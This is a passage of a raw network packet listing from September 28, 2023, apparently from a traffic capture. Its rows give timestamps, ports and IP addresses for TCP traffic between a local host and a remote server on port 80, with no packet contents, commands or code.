Sep 28, 2023 06:01:56.769835949 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769870996 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769875050 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.769875050 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.769875050 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.769875050 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.769906044 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769946098 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769961119 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.769961119 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.769961119 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.769984007 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.769992113 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770024061 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770054102 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770059109 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770073891 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770093918 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770119905 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770128965 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770142078 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770164967 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770188093 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770203114 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770210981 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770240068 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770262003 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770277023 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770289898 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770313978 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770333052 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770350933 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.770363092 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.770414114 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771215916 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771253109 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771320105 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771388054 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771388054 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771388054 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771388054 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771426916 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771456003 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771465063 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771476984 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771506071 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771537066 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771544933 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771558046 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771601915 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771620989 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771656990 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771682024 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771718025 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771725893 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771761894 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771781921 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771799088 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771819115 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771833897 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771842003 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771871090 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771893024 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771929026 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.771939993 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771977901 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.771992922 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772016048 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772033930 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772053003 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772073030 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772089005 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772095919 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772125959 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772144079 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772181988 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772197008 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772233963 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772248983 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772270918 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772285938 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772310019 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772320032 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772351980 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772367954 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772389889 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772409916 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772433043 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772449017 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772469044 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772489071 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772509098 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772526979 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772547007 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772558928 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772584915 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772602081 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772624016 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772639036 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772660971 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772681952 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772697926 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772716999 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772733927 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772747993 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772772074 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772785902 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772819996 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772825003 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772857904 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772871017 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772895098 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772903919 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772932053 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772942066 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.772969007 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.772981882 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773004055 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773015022 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773041964 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773055077 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773078918 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773089886 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773116112 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773130894 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773152113 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773164034 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773189068 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773200989 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773226023 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773241043 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773263931 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773277044 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773300886 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773312092 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773336887 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773350954 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773372889 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773380041 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773411036 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773425102 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773451090 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773467064 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773488045 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.773497105 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.773538113 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.826209068 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:01:56.950963974 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951082945 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951107979 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951198101 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951235056 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951256037 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951364040 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.951414108 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951452971 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951472998 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951493025 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951513052 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951533079 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951553106 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951572895 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.951577902 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951627016 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951656103 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.951673985 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951679945 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.951694965 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951720953 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.951747894 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.951843023 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951894999 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.951908112 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951956034 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.951982975 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.951993942 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952008963 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952028990 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952044010 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952054977 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952100039 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952112913 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952158928 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952176094 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952224970 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952239037 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952274084 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952289104 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952316999 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952342033 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952377081 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952528954 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952574968 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952647924 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952696085 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952812910 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952862978 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952874899 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952922106 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952938080 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.952981949 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.952994108 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953013897 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953037024 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953041077 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953057051 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953079939 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953105927 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953125000 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953155041 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953171015 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953186035 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953197002 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953234911 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953263044 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953310013 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953351974 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953398943 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953448057 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953494072 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953542948 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953598022 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953610897 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953660011 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953674078 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953721046 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953735113 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953772068 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953779936 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953814030 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953900099 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953911066 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953943968 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953952074 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.953978062 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.953989029 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954044104 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954061985 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954133034 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954140902 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954171896 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954197884 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954242945 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954243898 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954293013 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954309940 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954355955 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954371929 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954417944 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954442024 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954480886 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954489946 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954530954 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954540968 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954583883 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954592943 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954637051 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954663038 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954706907 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954724073 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954765081 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954828978 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954864979 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954873085 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954901934 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.954941034 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.954977036 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955002069 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955044985 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955054998 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955094099 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955107927 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955152988 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955200911 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955213070 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955245018 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955271006 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955312967 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955316067 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955368042 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955418110 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955440998 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955466986 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955488920 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955514908 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955537081 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955554008 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955560923 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955598116 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955614090 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955655098 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955671072 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955710888 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955761909 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955804110 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955812931 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955838919 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955842972 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955885887 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.955893993 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955940008 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.955954075 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956005096 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956011057 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956063986 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956089973 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956146002 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956162930 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956175089 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956218004 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956226110 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956263065 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956285000 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956326962 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956331015 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956372976 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956387997 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956415892 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956455946 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956456900 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956475973 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956495047 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956520081 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956558943 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956562042 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956600904 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956667900 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956712008 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956888914 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956907034 CEST	80	49804	157.90.36.211	192.168.2.3
Sep 28, 2023 06:01:56.956933975 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956948042 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:56.956969976 CEST	80	49804	157.90.36.211	192.168.2.3
